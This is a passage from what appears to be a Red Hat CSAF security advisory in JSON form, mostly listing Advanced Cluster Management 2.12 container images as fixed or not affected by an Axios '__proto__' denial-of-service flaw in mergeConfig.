"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:4f666d6acef380066f2a35f128a2842ee1f5cf800c93ac6b0fb3c303d3bde26b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:6938b16a6314149cc86e10a91e05e9b84e00483dadd1d0353002222a350746bf_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:8b91cd509eee3e1a5e6475076512709bd233413bfbea5caa44455fd62bcc9d35_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:f734a96076321df1f52da24f047db29d3956ceb742f4fa488a11d5b302faf66f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:1cfe9d5337e2d2d6d714d5d1aecd00ed626f4c70a5a655d89c8001717be9a6f5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:488d5dea57994e8d865f8047f3b0ed8b2250273898972eea576fa012bda5c0c4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:5bf4239a40668dd33521ad9cebdc2022331e251ad6fd2e8ec0de8526d321b9e5_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:bc42add4b0d8571b0b78d09357c574a7d0a858769e6109a13d1487de36ba1d2f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:1395a46c08410f06aa507bedc8d664b6dabda344d9c604bd71bbd07fb07966c4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:4b1bdbd8499769e3fe41d438ff2f98a0a91fecf88d70aa359a6be16aa5454fda_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:91d0b7afff7c89c667986f22280a95ab81409aacaf6c73ac6606bc7bbae98c7e_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:c24affed309531bede6ca42f8b2a6b3ba4df5a8c59084bf5050290b8f031f364_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:036d63ee1fe55977200dce97fd151726266e84423067039c57ca54dcc8b6b440_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:1aff938b39c21378c0f8daa439e330159c0bd91f234035a127efb579f6434262_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:540de89284569933a75e87f4c85fc11f987a733f60f9d877f20e5c4fc054fabf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:8352d34740671e09ebdd558bb2a40a8605aa26afbcfff8dae29ccaf86d81239d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:4707fd802a74ca843e2b788b69dc1d4615acba980df380e0cc25cfca6a82e215_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:5c3ee23cff1681f8e86f2bd5d1cebf187db867fb1887d7803638d1192e4b1a60_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6260b2ecf13d9c5cdf95f0000044405d3ca03815937284b5e2848147d3366538_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:78cbcb6e0a0e43cbac6b285334ba789d4a4940e12f472d56a7d953b342a34d1f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:6c733e3c2cc551a4bb17601347f873d3b28e4d6b60a26db3587173c617a85c7e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:6cbf2b90d1cbfbca5fe5b04f73024a5d78248b1e4ccf6041b77018d79296e1ee_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:8b47e540acf25c492b4e6dff77f419c65c80e14d8c95555eba549a7fbbaed564_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:fffd63a467ff39cb493e680ca5d7fff974c66afb014f3d5e83591b934e58b2ac_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:06ff7067f1bc9d0cafba03eeb46bf3214dd70f20e5eb05e3a989d12cfee5791f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:33d9572f58f2bbd6c1dfc07908b328ecc25b12f578d2f3839f70763c032fe39e_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:997e343d3a52d953cca38ea609dabfa38d8e85e3122f0c48bdf34dc398b0e75c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:ddeb74afd3c44b7e6ce34d14245f9b0e686af1d6628c2bae2b1ee4766107590e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:8b4adb87be3cd1222dbec53de842569d89f1edc18f36f5da691f2b9aef851af8_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:a5544dbf33ee411c1e2bce8af5cfd7defda6de92a358097419f2bac069669275_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:b3caff7e4a5254b20d305ec57b70d372ba09a4605047812703a7c7df6628192b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:cde651ab8f772b65d45464e4997c6ae17e655696afebf3ad51aa079853627061_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:33ae10350417be44904c47179d655c36e5724241e5dd1497d6952c46ada085e3_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:92c1123b4f6c4e89be7a0d9cd4adcafb9b97faebebd61dc24127661e45b61ec7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:b321bc989aede13694825dfa5ee6e6bf047e1d8da91a8fb83dc29cd0b27ab4ff_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:d41b061123db846fb27ddccffa7c57528326bcfa109f7d0a754e64aa16304b05_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:19ccb43f156361e14c8d69a6d832b60a63801fec502bd0f1632a264611c00a5c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:345bd79af661294f223be69961f96494da36e311906fb3a2e64b53677f65fd32_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:3cb2dd7e3a2cd4e2a46cde1f48dd72645c2c51e8bfc0eca8753cc851c726d29c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:c834685380ba00674a2835151ec9e4932457abefe6318748aba92cbe8443307d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:12c970f2005e943d674b35c711d2232f146bbbcf8e3807b3fb3c816b42e0cd8a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:dc231932eb7a2a9969fae5fb0e6f95594d71ddf6f957a2cb4751950ab8332510_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:e671767bca7b68bada15e2820d0df6adc49fbffcdb6c9708ee3a5346a919a1e4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:f64b875dcce5d957aaf198e2055a47f7faab441342aab6b2e055efe2d41c78b7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:0799283c1830e1aadd09976286eec671d0a86e44c155238279938b4f329f7157_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:7143a1a00eae582cff7671ab03464db03db48e89bd988ecc4851278922aeea29_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:9bac11bcf557740673e7168bb31fb6db8c5d92609094e5f1d1cb4c3ef6bc9603_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:ea03fd92669382846af5c8fa0b58f6858f123060d122f370d6af837f46d9d8aa_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:53a9844ffdd2d3f8cee8737722de91511cefdb4c65a7db614de6c4e070f70431_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:c603c06aa983d6b118e506bd2e6fba19f0cd26e379513c9c710ea517d2bc0d0f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:d9a867a6d289263f568b8940a9b970c8680061c1f26aebb9f8cc479956e9a030_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:f9e0a972cd08f77b71dd8b2217c57b98b36c5612ddfd6bb74704c378a03dd7e1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:1bda811b132cbc2220815d36983af98e0aafdcb4d30fa78f56bbd85ffc30a37c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:3bc66380cc46ef4bc18498a306535c11f0ba41a629bde92f9f6a35b8a8d11f89_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:c4f9eea72efd49d201456547b2a35abd6a194894e72c209bbe16763b86954639_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:d4b3934ecbd4882845770c313060dc76b588ffa3753f2b2ae0ec5f53ba868935_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:805d44ff7dcd6df5bd73cd58c0f410d8bdeac932d7c440b0c381517c3e1401ae_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:b3cbb2410596e3e0741f518ee3bbf8f6eebce0ea4a7ea4274a1e76f01692fe1e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:c6365357cdc1cd7b0adc4e1813f42d2c67501f770ee58e376e0c02096baca731_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:e3d8e0154fdaaa4e292949374fa637ec80827df473f2e3f8cc37425d98dc271b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:943de4b7c383fc679eac276a25ce6557336c95b92ebaa520bb74f8aee24115f5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:d448249f704e54f4316122fb3ad923295ffb5d6d2d16044803b56d1f8439de8f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:ee2ffe06e09f3694be474d69be61552d0e5a4dd7a25df89682aa59e4a10e02f8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:f9dfff5ac57b47b580c733413ab3d10dec4d4d50589da894eb0a8278978459f9_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:5c90f0eddf6dbee5bdf11a6a818e4fbac22f6c8b2883728416dcc7aaeedd7362_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6528ed4780303fa09312c19f87c0f7d7109d91858473f73e6567e0fdde694b3f_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6d1a86ffe09cbc6eba216db55800c21641e308dd1cee215972e0065136b9c612_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:fc6ea36b48ce47052d875988f378cad3ec9cec80189a605acdf1509f2beb52cf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:0caaa7f18df2105c9d6199343a70640dd6b558d7de55f2026f99b48d702c5afc_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:28cfe0893f17b70ff67f70cb7e471c8c724bf921b7a36c69ca2c43505bae635e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:7309f5d61a0fe99dfd8d523736afe2c8a709385e0eaaeaacfbda362fc7c2a16b_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:ccf06b51ce92c9f0fe9594b0082d0b09f77bb65b38ce08d5e02ac4f5a6fab2a4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:31153305711975b0bd5f780133699aeca52e96859363e85718c9047b26a32dbf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:55b2f0e54a6fdb3fb83f1af1f16524ebf36f0afb366f40fbbc8768cd4995ffb3_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:6be8bc17e09b099a79437f27ded3d563814e3c6702dd9ed698f5f17b9fb3afa2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:73c4ce25c2cc67fe3bec0cfc51e4c8b34929288f931f0f19c65bbbc969d0c588_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:128b74a18fb1fd1ba63f074d9d31e892a46048068608784f2696a4bbc7b57595_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:6b3fd2f8e3a164670dbbc59fd8c77057f98d97c0ba6ed7975711923e8acabb78_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:7c8de9466fee7334af1fef5647c4abaf9bd6b6012c301bb5c3c6a630cdc1dded_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:bbd945e3d0f92c8dfeb5601d7aa4d306f87e6facd9471a3c42f2582a264cd2ba_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:3aa3b11dfb3e0c9daba4818838a3a42e52ab81ecf27fb5fddd779746fd10d6d8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:8c19e6e38d755f35021ed1c57f3e69be65240df37539b72b8fe0d3f8ab050e36_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:a8f9a5a9f31cd903f23dfec9c832ed703d06882246aad25bd03e9512b633e5ca_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:e528d7996cda9185d5858a0edd8114b782d5627725d6e350fb087ba9f6270206_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:6a4fe92a913d7b778b8e756c618537c4a44aba7adc980355afcaf88b5cb871e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:b2563c07d52bd29574e0a896a2e72b90ff1144be31ec3dab9f89840be79936df_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:baacec8e68f6fcc0f4ee99f4405f80c560be369ec969a574534b01f43419a15d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:c7a24bf421728915b2e0cf3a7e803cbb18032959feab0cd2867b13f356136178_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:1f747a2fe3ee946ec3df5335c6527da41b84a92c1b7163e24b72809f958934a5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:699833b6f4ee8b8fdb45d5ed4a312972281576700a1a1d28dc0048d6c7188361_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:b807be4db3f323ac57c1464843c1b7dc1479b24ac89dadd070813da75f282375_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:d1c112f5dd97d3415030ab12eb93006c04070f70176e89e2555b071d4b1dc881_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:a20f72f80173be40bbd330de88bc94d32e7596bf1b0fd76dd895b739f2df1c2e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:d815d7688e0ad3e0d9b20a73f418282ac47eb0c6a2721db959374ff9b5756918_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:dd779a5f1de2fb5b61333ef7d11642a4e8cbfcb745f3f0a4318e336f6fe4e5b6_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:f9e8be1fdc48039e3a46a09b9c1279d343a1fb48b987d0d2bdf7c4f0a720ca85_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:2fdcbd70cddfd8ef3d3211529434f24f69ff79fae57143e5ce66452a613b5c56_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:3d863c8706fca20261d46d0591ca2c18d34db98c5341136c840a80d0c285520c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:83eda40795e9b589114cddae252af2fc68ccf76b2a73522ad1094b2f84829be7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e94fb4d6c912c989e11532bd86fe3a2eab5b17329fb3b11362be651609863a50_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:030626d6ba921752acbc68159d7a6776318416c93cfc4360ef8e3c145e9ee635_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:0bdccbe184d904b58291858f01597286b2a0c45584f9af263714089911390f4c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:5fd8d966136617fd453431a649a6572ad640ca515b91c86b9a576c7b1e4fbd0e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:c6b267f6f0bb960032c380a0d978ebe3c8cd948f57a92ba9855c273fbd40a487_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2438237"
}
],
"notes": [
{
"category": "description",
"text": "A denial of service flaw has been discovered in the Axios npm package. the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "axios: Axios affected by Denial of Service via __proto__ Key in mergeConfig",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:0d6238ef864831d455a4a4b86d860469443079f6dcd26ce3b4fe546800565844_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:5c7378c5f1715490a88eaa2b791b4a643ee089f9b72ad4abfaf32d718f387fc8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:7e8f4c171a3081e428c168b506c544775876df772803e2cae4512d3c46b45354_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:8b0e5d09b887020a657b93953a63a788cf6dfc84200038be8417c2f9cd1df736_amd64"
],
"known_not_affected": [
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:20a379058f6e7b95ba010b0ceb936e124a67ad493975557c4bfe085948166b6e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7fb6e4b9729a300d9e82207ede660b52c2566fcdfb1f7174e5dd4cd59514afdf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:8a842f5c48c760be11d7df87fc2519bd9a68886bce7240aabea3e7a99c6bc172_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:fdcd8eff118d00b93f7a197c992bd5ddd1cce96b2b5cf3b542403dcbcc812691_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:59a7ad296b2023d6a633e2f7b99767e2c0c35ead31c8d92bdf233ff52522125d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:5a1fba286678b5d606a3ad553041cd68df207820c5f11685f7df0e94d04c27e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:60546ec2d4128da096811949b2609bdb9c7cb6205b36673ebe9d7b1ff868ea88_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:647b86bfc09d7eca6a7c3f7ee967ea60db1b90329600a0898f8f8b7bbdb204bf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:495889c3607c289f7265ef7bf18187686fedcbf8c382e86e8e98cdc31e8479d5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:519bd85630bb8c1eac29ca79a21a09e949fbe507e4186fe5d990c357517731a7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:b97cb625d22889517ef86b148ca4bfcc20e39bb887e0715ac37bd915cf45a83b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:d92337026de448a873fe66754e1ea837f7a650b4c8b1a057cbef1cceb6ae114a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:1ba9482f4a157a04b4b5cc212b7cbb98a323250969501698b230432a6ea545a5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:371bbcd62cb8e6c28cd3c1921e17c9067bc160433c4a6b14a1a2685a5f7d0519_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:922167d560484b217f772384cac0e9da48c31633ebf8984abf3ef99f5c31919b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:fd95f9c98201fc9e2deb2ce1af7598056e7e2bd61e2db42d195fa8acd4958f79_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:280e1dc73ea367d9c818086754ece9ea2d5a2c96496dcfea09844a7a55feb51d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:2d8b0b11cf907b25304501a2a62d5551c792c1fb3662ea4cd0e01db724a57b86_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:9abfdfd7491e219d7249800e05298472c4d545687fa7b6c79da71f9414f29d12_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:c11c8ba588a27d39f1b46bc6b63eebd8e9f9a822917a7638216c7fb93350aaf3_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:16710678f62e24a8877350bfdada7b8a533d4abad81984145e31614dc0e64d26_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:88c844cba042e1cd006c3ad413808ad10c4bdb95e8c0fc7b79cec3c3c40882b1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:d32bc1e886821ba104e8b2a5e16dc7b0aa1a01ea927e426ebd264298ac1d66f8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:f09e16c30c4641612b2306cdbf56f85e31e03028d522597adf2e00f781148254_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:0dbdb9d02b41e437dd885741918114d8eea5bcdb1e97098b8e026adaf0cc70de_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:5a2014800be744b5034e754ad88cc82c29779c629cf2aa52068274aecd7b9d88_arm64",
